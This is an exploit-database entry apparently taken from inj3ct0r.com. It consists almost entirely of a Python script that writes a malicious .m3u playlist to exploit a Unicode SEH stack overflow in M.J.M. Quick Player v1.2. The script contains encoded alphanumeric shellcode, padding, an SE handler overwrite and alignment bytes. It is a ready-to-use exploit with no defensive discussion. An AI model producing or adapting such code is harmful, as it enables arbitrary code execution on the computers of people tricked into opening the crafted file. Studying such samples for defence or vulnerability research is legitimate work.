M.J.M. Quick Player v1.2 Unicode Stack overflow exploit
Source: inj3ct0r.com  Author: Molotov  Published: 2010-02-10


#!/usr/bin/python
#
#   M.J.M. Quick Player v1.2 Unicode Stack overflow exploit
# by :     Molotov From Privat Team Hackers of Morocco

# Reference: http://inj3ct0r.com/exploits/8217

shellcode = (
"PPYAIAIAIAIAQATAXAZAPA3QADAZABARA"
"LAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZA"
"BABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JB"
"KLK8U9M0M0KPS0U99UNQ8RS44KPR004K22LLDKR2MD4KCBMX"
"LOGG0JO6NQKOP1WPVLOLQQCLM2NLMPGQ8OLMM197K2ZP22B7"
"TK0RLPTK12OLM1Z04KOPBX55Y0D4OZKQXP0P4KOXMHTKR8MP"
"KQJ3ISOL19TKNTTKM18VNQKONQ90FLGQ8OLMKQY7NXK0T5L4"
"M33MKHOKSMND45JBR84K0XMTKQHSBFTKLL0KTK28MLM18S4K"
"KT4KKQXPSYOTNDMTQKQK311IQJPQKOYPQHQOPZTKLRZKSVQM"
"2JKQTMSU89KPKPKP0PQX014K2O4GKOHU7KIPMMNJLJQXEVDU"
"7MEMKOHUOLKVCLLJSPKKIPT5LEGKQ7N33BRO1ZKP23KOYERC"
"QQ2LRCM0LJA"
)

buffer = "\x41"*536     # junk

buffer+="\x41\x6D"
buffer+="\x41\x4D"  # SE Handler (unicode format = 0x004A0059)

buffer+= '\x58\x6d'
buffer+= '\x05\x02\x22\x6d'
buffer+= '\x2d\x12\x22\x6d'
buffer+= '\x50\x6d\xc3'

buffer+='A' * 1495  # some mo' padding to please my eyes
buffer+= shellcode
buffer+= 'A' * (3000-len(shellcode)-1495)


f = open("maroc.m3u", "w")
f.write(buffer)
f.close()

print "[*] File created !"


 